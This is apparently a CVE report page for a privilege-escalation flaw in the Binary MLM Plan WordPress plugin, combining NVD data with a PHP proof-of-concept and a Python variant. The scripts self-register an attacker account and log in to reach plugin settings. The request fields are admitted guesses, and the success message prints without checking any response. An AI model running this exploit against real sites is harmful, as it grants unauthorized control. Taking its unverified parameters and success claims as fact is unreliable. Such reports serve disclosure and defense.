Security Vulnerability Report
CVE-2025-10038 CVSS 6.5 MEDIUM

CVE-2025-10038

Published: 2025-10-15 09:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Binary MLM Plan plugin for WordPress is vulnerable to limited Privilege Escalation in all versions up to, and including, 3.0. This is due to the bmp_user role granting all users the manage_bmp capability by default upon registration through the plugin's form. This makes it possible for unauthenticated attackers to register and manage the plugin's settings.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Binary MLM Plan <= 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-10038 PoC - Binary MLM Plan Privilege Escalation
 *
 * This PoC demonstrates how an unauthenticated attacker can register
 * and obtain manage_bmp capability through the plugin's registration form.
 *
 * Root cause per the advisory: the plugin's bmp_user role carries the
 * manage_bmp capability by default, so any self-registered account can
 * manage the plugin's settings (all versions up to and including 3.0).
 *
 * NOTE(review): the AJAX action name, the registration field names and the
 * admin page slug used below are not stated in the advisory; they are
 * assumptions (the original author marks the action name as a guess).
 * The NVD references point to plugin changesets for
 * includes/admin/class-bmp-admin-menus.php and includes/bmp-hook-functions.php
 * (tag 3.0 -> 5.0), presumably where the capability assignment was changed.
 *
 * Side effects: writes session cookies to cookies.txt in the working
 * directory and prints the raw HTTP responses to stdout.
 */

// Target WordPress site URL
$target_url = 'https://target-wordpress-site.com';

// Step 1: Access the Binary MLM Plan registration page
// (assumes the plugin's form submits through admin-ajax.php)
$registration_page = $target_url . '/wp-admin/admin-ajax.php';

// Step 2: Prepare registration data
// NOTE(review): none of these parameter names are given by the advisory.
$registration_data = array(
    'action' => 'bmp_user_registration', // or the actual AJAX action used by the plugin
    'username' => 'attacker_user_' . rand(1000, 9999),
    'email' => 'attacker' . rand(1000, 9999) . '@evil.com',
    'password' => 'P@ssw0rd!2025',
    'confirm_password' => 'P@ssw0rd!2025',
    'first_name' => 'Test',
    'last_name' => 'User',
    'phone' => '1234567890',
);

// Step 3: Send registration request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $registration_page);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($registration_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest'
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// The response is only echoed; nothing below inspects it or $http_code.
echo "Registration Response (HTTP $http_code):\n";
echo $response . "\n\n";

// Step 4: After successful registration, the attacker has bmp_user role
// with manage_bmp capability, allowing them to access plugin settings

// Step 5: Login with the newly created credentials
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $registration_data['username'],
    'pwd' => $registration_data['password'],
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Session cookies are persisted to cookies.txt in the working directory.
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded'
));
$response = curl_exec($ch);
curl_close($ch);
// NOTE(review): both messages are printed unconditionally; $response is never
// inspected, so this output does not confirm a login or the capability.
echo "Login successful! The attacker now has manage_bmp capability.\n";
// NOTE(review): the bmp-settings page slug is assumed, not taken from the advisory.
echo "They can now access plugin settings at: $target_url/wp-admin/admin.php?page=bmp-settings\n";
?>
# Alternative: Using Python with requests library
#
# import requests
#
# target = 'https://target-wordpress-site.com'
# session = requests.Session()
#
# # Register a new user through the plugin's form
# reg_data = {
#     'action': 'bmp_user_registration',
#     'username': 'attacker_test',
#     'email': '[email protected]',
#     'password': 'SecurePass123!',
# }
#
# resp = session.post(f'{target}/wp-admin/admin-ajax.php', data=reg_data)
# print(f'Registration: {resp.text}')
#
# # Login with the new credentials
# login_data = {
#     'log': 'attacker_test',
#     'pwd': 'SecurePass123!',
#     'wp-submit': 'Log In',
# }
# resp = session.post(f'{target}/wp-login.php', data=login_data)
# print(f'Login response status: {resp.status_code}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10038", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:36.167", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Binary MLM Plan plugin for WordPress is vulnerable to limited Privilege Escalation in all versions up to, and including, 3.0. This is due to bmp_user role granting all users with the manage_bmp capability by default upon registration through the plugin's form. This makes it possible for unauthenticated attackers to register and manage the plugin's settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3380455/binary-mlm-plan/tags/5.0/includes/admin/class-bmp-admin-menus.php?old=3259986&old_path=binary-mlm-plan%2Ftags%2F3.0%2Fincludes%2Fadmin%2Fclass-bmp-admin-menus.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3380455/binary-mlm-plan/tags/5.0/includes/bmp-hook-functions.php?old=3259986&old_path=binary-mlm-plan%2Ftags%2F3.0%2Fincludes%2Fbmp-hook-functions.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/binary-mlm-plan/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7951c8e4-b610-4cc4-ab27-4cfa78d72302?source=cve", "source": "[email protected]"}]}}